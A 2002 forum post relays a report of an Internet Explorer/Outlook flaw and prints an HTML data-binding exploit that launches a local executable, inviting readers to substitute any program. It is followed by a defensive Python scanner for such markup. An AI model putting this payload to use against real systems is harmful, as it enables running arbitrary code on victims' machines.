TechSpot

Another IE/Outlook Hole

By lokem
Mar 6, 2002
  1. The Register has just posted that IE/Outlook can run arbitrary commands with a simple bit of HTML.

    Read the rest here:

    http://www.theregister.co.uk/content/4/24274.html

    The article also has a simple fix for this problem.

    Here's the simple script:

    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
    <security>
    <exploit>
    <![CDATA[
    <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
    ]]>
    </exploit>
    </security>
    </xml>


    Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary.
     
Topic Status:
Not open for further replies.
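A defensive check for the markup quoted in the post, as an added example that is not part of the original post: it scans raw HTML or mail-body text for `<object>` tags whose `codebase` names a local executable and records whether the document also binds data as HTML (`dataformatas="html"`). The function names, the extension list and the benign sample are assumptions made for illustration.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample: the markup quoted in the post above, condensed onto fewer lines.
POST_SAMPLE = '''<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"><security><exploit><![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
]]></exploit></security></xml>'''

# Constructed benign sample: a control fetched from a remote .cab (hypothetical URL).
BENIGN_SAMPLE = ('<object classid="clsid:22222222-2222-2222-2222-222222222222" '
                 'codebase="http://example.com/control.cab#version=1,0,0,0"></object>')

OBJECT_TAG = re.compile(r"<object\b([^>]*)>", re.IGNORECASE)
ATTRIBUTE = re.compile(r"""([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
HTML_BINDING = re.compile(r"""\bdataformatas\s*=\s*["']?html\b""", re.IGNORECASE)
LOCAL_PREFIX = re.compile(r"^(?:[a-z]:[\\/]|file:|\\\\)", re.IGNORECASE)
EXECUTABLE_EXTENSIONS = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif"}  # assumed list


def parse_attributes(tag_body):
    """Return the tag's attributes as a dict with lower-cased names."""
    found = {}
    for name, dq, sq, bare in ATTRIBUTE.findall(tag_body):
        found[name.lower()] = dq or sq or bare
    return found


def is_local_executable(codebase):
    """True when codebase names an executable on a local drive, file: URL or UNC share."""
    value = re.split(r"[#?]", codebase.strip(), maxsplit=1)[0]
    suffix = PureWindowsPath(value).suffix.lower()
    return bool(LOCAL_PREFIX.match(value)) and suffix in EXECUTABLE_EXTENSIONS


def scan(markup):
    """Scan raw text, CDATA sections included, and return one finding per flagged tag."""
    html_bound = bool(HTML_BINDING.search(markup))
    findings = []
    for match in OBJECT_TAG.finditer(markup):
        attributes = parse_attributes(match.group(1))
        codebase = attributes.get("codebase", "")
        if is_local_executable(codebase):
            findings.append({"codebase": codebase,
                             "classid": attributes.get("classid", ""),
                             "html_bound": html_bound})
    return findings


if __name__ == "__main__":
    for label, sample in (("post", POST_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan(sample))
```

The scan works on the raw text rather than a parsed DOM so that tags hidden inside a CDATA section are still seen.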

